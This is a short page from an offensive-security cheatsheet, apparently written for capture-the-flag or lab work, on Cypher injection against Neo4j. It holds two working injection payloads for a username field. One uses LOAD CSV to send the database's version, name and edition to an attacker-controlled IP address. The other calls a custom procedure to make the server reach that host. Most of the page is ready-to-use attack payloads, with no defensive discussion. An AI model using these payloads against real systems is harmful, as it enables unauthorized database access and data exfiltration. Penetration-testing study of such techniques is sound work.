cheatsheet
  • Cheatsheet
  • General
  • NMAP
  • Directory and subdomain Enum
  • SMB and RPC
  • DNS
  • LDAP
  • mimikatz
  • Bloodhound
  • SQL Injection
  • password crack
  • Active Directory
  • Wordpress
  • SQLMAP
  • Gitea
  • DS_Store
  • IIS
  • Cypher Injection
  • MSSQL
  • BackDrop CMS
Powered by GitBook
On this page

Cypher Injection

  • Refer this article for exploiting the cypher injection

  • using the below payload to confirm the cypher injection in the username parameter

' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.49/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

  • Let’s use below payload to get the hit on our machine (getUrlStatusCode because the webpage/code is checking for status code)

' return h.value as a UNION CALL custom.getUrlStatusCode('http://10.10.14.49:80') YIELD statusCode AS a RETURN a;//

PreviousIISNextMSSQL

Last updated 1 month ago